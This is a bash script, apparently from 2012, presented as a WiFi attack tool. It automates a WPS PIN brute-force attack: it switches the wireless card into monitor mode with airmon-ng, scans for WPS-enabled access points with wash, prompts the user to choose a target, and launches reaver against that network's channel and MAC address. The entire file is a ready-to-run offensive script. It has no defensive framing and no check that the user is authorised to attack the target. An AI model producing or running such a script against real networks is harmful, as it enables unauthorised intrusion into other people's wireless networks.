WiFi attack script based on reaver and aircrack-ng

1. #! /bin/bash
2.  
3. #WiFi Attack Script, v1.0
4. #Author: Vinay Gopinath
5. #Date: 26 October, 2012
6.  
7. #CONFIG: Customize the script according to your needs
8. #The default wireless interface (usually wlan0, wifi0 or ath0)
9. wireless_interface=wlan0
10.  
11. #The timeout (in seconds) for wash to search for WPS-enabled access points
12. wash_timeout=15
13.  
14. #Flag to allow user to choose target AP
15. allow_user_choice=1
16.  
17. #Delay between attack attempts
18. reaver_delay=0
19.  
20. #Check for root privileges
21. if (( EUID != 0 )); then
22.   echo "This script needs root"
23.   exit 1
24. fi
25.  
26. #Check for required commands
27. for command in airmon-ng wash reaver
28. do
29.   if [[ -z $(which $command) ]]; then
30.      echo "$command was not found"
31.      echo "To install $command, you may follow this link"
32.      echo "http://lmgtfy.com/?q=$command+installation"
33.      exit 1
34.   fi
35. done
36.  
37. echo "WARNING: Network connections are about to go down. You may need to re-enable wireless connections manually"
38.  
39. #Check available interfaces and close previous monitor interfaces and wireless lan
40. for interface in $(ifconfig | tr -s [:space:] | cut -f1 -d" " | tr -s [:space:])
41. do
42.   if [[ -n $(echo $interface | grep "^mon*") ]] || [[ -n $(echo $interface | grep '0$') ]] && [[ $(echo $interface) != "eth0" ]]; then
43.     echo "* Shutting down $interface"
44.     airmon-ng stop $interface > /dev/null
45.   fi
46. done
47.  
48. echo "* Starting a new monitor interface mon0"
49. airmon-ng start $wireless_interface > /dev/null
50.  
51. echo "Identifying WPS-enabled access points"
52. timeout $wash_timeout wash -i mon0 --ignore-fcs > washOutput.txt
53. APs=$(cat washOutput.txt | tail -n +3 | tr -s ' ' | cut -f6 -d' ')
54.  
55. if [[ -n $(echo $APs) ]]; then
56.    if  (( $allow_user_choice )); then
57.       n=1
58.       echo "The following access points were detected"
59.       for ap in $APs
60.       do
61.         echo "* $n: $ap"
62.         ((n++))
63.       done
64.       read -p "Enter your choice: " choice
65.       if [[ $choice -le $n ]]; then
66.         chosen_ap=$(echo "${APs}" | head -$choice | tail -1)
67.     echo "You have chosen $chosen_ap"
68.       else
69.     echo "Invalid choice!"
70.     exit 1
71.       fi
72.    else
73.       chosen_ap=$(echo "${APs}" | head -n1)
74.       echo "Proceeding with choice 1: $chosen_ap"
75.    fi
76.    tempLine=$(cat washOutput.txt | grep $chosen_ap | tr -s ' ')
77.    rm washOutput.txt
78.    channel=$(echo $tempLine | cut -f2 -d' ')
79.    mac_address=$(echo $tempLine | cut -f1 -d' ')
80.    echo "Starting reaver"
81.    echo "reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay"
82.    echo "AP name: $chosen_ap"
83.    echo "Channel: $channel"
84.    echo "MAC Address: $mac_address"
85.    reaver -a -S -vv -c $channel -i mon0 -b $mac_address -d $reaver_delay
86. else
87.    echo "No networks found. Consider increasing the wash timeout. Terminating"
88.    exit 1
89. fi